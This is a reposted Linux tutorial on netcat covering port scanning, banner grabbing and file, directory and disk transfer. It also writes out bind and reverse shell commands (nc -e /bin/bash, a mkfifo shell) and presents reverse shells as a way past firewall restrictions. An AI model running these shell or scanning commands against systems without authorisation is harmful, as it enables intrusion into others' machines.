文档章节

Linux Netcat command – The swiss army knife of net

杨尚川
 杨尚川
发布于 2015/02/11 20:52
字数 1829
阅读 103
收藏 2

Swiss Army Knife of networking netcat is a versatile tool that is able to read and write data across TCP and UDP network . Combined with other tools and redirection it can be used in number of ways in your scripts. You will be surprised to see what you can accomplish with Linux netcat command.

What netcat does it opens the connection between two machines and give back two streams. After that everything is up to your imagination. You can build a server, transfer files, chat with friends, stream media or use it as a standalone client for some other protocols.

Here are some of the usage of netcat.

[A(172.31.100.7) B(172.31.100.23)]

Linux netcat command examples

1. Port scanning

Port scanning is done by system admin and hackers to find the open ports at some machine. It helps them to identify the venerability in the system.

$nc -z -v -n 172.31.100.7 21-25

It can work in both TCP and UDP mode, default is TCP mode, to change to udp use -u option

z option tell netcat to use zero IO .i.e the connection is closed as soon as it opens and no actual data exchange take place.
v option is used for verbose option.
n option tell netcat not to use the DNS lookup for the address.

This command will print all the open ports between 21 to 25.

Banner is a text that services sends when you connects to them. Banner are very usefull when you are trying to velberability in the system as it identify the type and version of the services. NOTE not all services may send banner.
Once You have found the open ports you can easily grab the service banner by connecting to them using netcat.

$ nc -v 172.31.100.7 21

The Linux netcat command will connect to open port 21 and will print the banner of the service running at that port.

2. Chat Server

If you want to chat with your friend there are numerous software and messenger services available at your disposal.But what if you do not have that luxury anymore like inside your computer lab, where all outside connections are restricted, how will you communicate to your friend who is sitting in the next room. Don’t worry my friend because netcat has a solution for you just create a chat server and a predetermined port and he can connects to you.

Server

$nc -l 1567

The Linux netcat command starts a tcp server at port 1567 with stdout and stdin for input output stream i.e. The output is displayed at the shell and input is read from shell.

Client

$nc 172.31.100.7 1567

After this whatever you type on machine B will appear on A and vice-versa.

3. File transfer

Most of the time we are trying to transfer file over network and stumble upon the problem which tool to use. There are again numerous methods available like FTP, SCP, SMB etc. But is it really worth the effort to install and configure such complicated software and create a sever at your machine when you only need to transfer one file and only once.

Suppose you want to transfer a file “file.txt” from A to B
Anyone can be server or client, lets make A as server and B as client.

Server

$nc -l 1567 < file.txt

Client

$nc -n 172.31.100.7 1567 > file.txt

Here we have created a server at A at redirected the netcat input from file file.txt, So when any connection is successfull the netcat send the content of the file.

Again at the client we have redirect the output of netcat to file.txt. When B connects to A , A sends the file content and B save that content to file file.txt.

It is not necessary do create the source of file as server we can work in the eopposeit order also. Like in the below case we are sending file from B to A but server is created at A. This time we only need to redirect ouput of netcat at to file and input at B from file.

B as server
Server

$nc -l 1567 > file.txt

Client

$nc 172.31.100.23 1567 < file.txt

4. Directory transfer

Sending file is easy but what if we want to send more than one files, or a whole directory, its easy just use archive tool tar to archive the files first and then send this archive.

Suppose you want to transfer a directory over the network from A to B.

Server

$tar -cvf – dir_name | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | tar -xvf -

Here at server A we are creating the tar archive and redirecting its outout at the console through -. Then we are piping it to netcat which is used to send it over network.

At Client we are just downloading the archive file from the server using the netcat and piping its output tar tool to extract the files.

Want to conserve bandwidth by compressing the archive, we can use bzip2 or other tool specific to content of files.

Server

$tar -cvf – dir_name| bzip2 -z | nc -l 1567

Compress the archive using the bzip2 utility.

Client

$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -

Decompress the archive using bzip2 archive

5. Encrypt your data when sending over the network

If you are worried about the security of data being sent over the network you can encrypt your data before sending using some tool like mcrypt.

Server

$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

Encrypt the data using the mcrypt tool.

Client

$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

Decrypt the data using the mcrypt tool.
Both the above commands will propmt for passowrd make sure to use the same password on both.

Here we have used mcrypt for encryption but any tool can be used.

6. Stream a video

Not the best method to stream but if the server doesn’t have the specific tools, then with netcat we still have hope.

Server

$cat video.avi | nc -l 1567

Here we are just reading the video file and redirecting its output to netcat
Client

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we are reading the data from the socket and redirecting it to mplayer.

7. Cloning a device

If you have just installed and configured a Linux machine and have to do the same to other machine too and do not want to do the configuration again. No need to repeat the process just boot the other machine with some boot-able pen drive and clone you machine.

Cloning a linux PC is very simple. Suppose your system disk is /dev/sda
Server

$dd if=/dev/sda | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd is a tool which reads the raw data from the disk, we are just redirecting its output stream through a netcat server to the other machine and writing it to the disk, it will copy everything along with the partition table. But if we have already done the partition and need to move only the root partition we can change sda with sda1, sda2 etc depending where out root is installed.

8. Opening a shell

We have used remote Shell using the telnet and ssh but what if they are not installed and we do not have the permission to install them, then we can create remote shell using netcat also.

If your netcat support -c and -e option (traditional netcat)
Server

$nc -l 1567 -e /bin/bash -i

Client

$nc 172.31.100.7 1567

Here we have created a netcat server and indicated it to run /bin/bash command when connection is successful.

If netcat doesn’t support -c or -e options(openbsd netcat) we can still crate remote shell.
Server

$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we have created a fifo. Then we have piped the content of this fifo file using pipe command to a shell 2>&1 is used to redirect stderr to same file where stdout is redirected which is piped to netcat server running at port 1567. Now here again we have redirected the output of netcat to fifo file.

Explanation:

The input received from network is written to fifo file.

The fifo file is read by cat command and it content is sent to sh command.

Sh command processes the received input and write it back to netcat.

Netcat send the output over the network to client.

All this is possible because pipe causes the command to run in parallel. The fifo file is used instead of regular file because the fifo causes the read to wait while if it was an ordinary file the cat command would have ended as soon as started reading an empty file.

At client is just as simple as conecting to server
Client

$nc -n 172.31.100.7 1567

And you will get a shell prompt at the client

9. Reverse Shell

Reverse shell are shell opened at the client side. Reverse shell are so named because unlike other configuration here server is using the services provided by the client.

Server

$nc -l 1567

At the client side simply tell netcat to execute the shell when connection is complete.

Client

$nc 172.31.100.7 1567 -e /bin/bash

Now what is so special about reverse shell.
Reverse shell is often used to bypass the firewall restrictions like blocked inbound connections. For example, I have a private IP address of 172.31.100.7 and I connect to outside network with a proxy server. If I want to access a shell at this machine from outside the network say 1.2.3.4, then I’ll use reverse shell for this purpose.

10. Specify Source Port

Suppose your firewall filters all ports but 25 then you need to specify the source port also with -p option
Server

$nc -l 1567

Client

$nc 172.31.100.7 1567 -p 25

You need root permissions to use port less than 1024.

This command will open the port 25 at the client which will be used for communication otherwise any random port can be used.

11. Specify Source Address

Suppose you have more than one addresses for your machine and you want to explicitly tell which address to use for outgoing data. Then we can specify the ip address with -s option in netcat
Server

$nc -u -l 1567 < file.txt

Client

$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

This command will bind the address 172.31.100.5.

These are just some of the examples to play with netcat.
Some Other uses can be.

  •     Telnet client with -t option,

  •     HTTP client to download files,

  •     Check mail by connecting to mail server and using SMTP protocol,

  •     Stream your desktop using ffmpeg to grab our desktop and many more.

In short if you know the protocol you can implement any client using netcat as medium for network communication.

REFERNECES

Netcat Man Page


© 著作权归作者所有

杨尚川

杨尚川

粉丝 1103
博文 220
码字总数 1624053
作品 12
东城
架构师
私信 提问
SunLightJuly/cocos2d-console

cocos2d-console Cocos2d-console is a command line tool that lets you create, run, publish, debug, etc… your game. It is the swiss-army knife for cocos2d. ##Install cocos2d-con......

SunLightJuly
2015/04/17
0
0
玩转 Linux 之:网络工具中的瑞士军刀 Netcat

netcat号称网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的...

大数据之路
2015/05/08
900
1
Linux 命令行里的“瑞士军刀”

这里说的“瑞士军刀”是指那些简单的一句命令就能完成其它高级语言一大片代码才能完成的工作。 下面的这些内容是Quora网站上Joshua Levy网友的总结: 通 过sort/uniq获取文件内容的交集、合集...

oschina
2013/06/08
8.6K
28
WeeChat 1.0 正式发布,轻量级 IRC 客户端

WeeChat 1.0 正式发布,此版本更新内容如下: - plugin "trigger": Swiss Army knife for WeeChat (replaces "rmodifier" plugin) - plugin "exec": execute external commands (replaces sc......

oschina
2014/08/17
4.5K
6
A Unix Utility You Should Know About: lsof

This is the third post in the article series about Unix and Linux utilities that you should know about. In this post I will take you through the usefullsof tool. If netcat was c......

nothingfinal
2012/11/08
0
0

没有更多内容

加载失败,请刷新页面

加载更多

PostgreSQL参数search_path影响及作用

search_path稍微熟悉PG就会用到,用法这里就不必讲,本篇主要讲它在程序里怎样处理。 1、GUC参数定义 这是个 config_string 参数 {{"search_path", PGC_USERSET, CLIENT_CONN_STATEMENT,...

有理想的猪
今天
9
0
Qt程序各个平台打包发布及安装程序大全

本文链接:https://blog.csdn.net/zhengtianzuo06/article/details/78468111 通用: 1.准备图标 图标可以直接使用一般格式的图片制作, 比如jpg, png等 推荐使用Photoshop制作原始图 推荐使用I...

shzwork
今天
12
0
springboot2.0 maven打包分离lib,resources

springboot将工程打包成jar包后,会出现获取classpath下的文件出现测试环境正常而生产环境文件找不到的问题,这是因为 1、在调试过程中,文件是真实存在于磁盘的某个目录。此时通过获取文件路...

陈俊凯
今天
22
0
BootStrap

一、BootStrap 简洁、直观、强悍的前端开发框架,让web开发更加迅速、简单 中文镜像网站:http://www.bootcss.com 用于开发响应式布局、移动设备优先的WEB项目 1、使用boot 创建文件夹,在文...

wytao1995
今天
10
0
小知识:讲述Linux命令别名与资源文件的区别

别名 别名是命令的快捷方式。为那些需要经常执行,但需要很长时间输入的长命令创建快捷方式很有用。语法是: alias ppp='ping www.baidu.com' 它们并不总是用来缩短长命令。重要的是,你将它...

老孟的Linux私房菜
今天
25
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部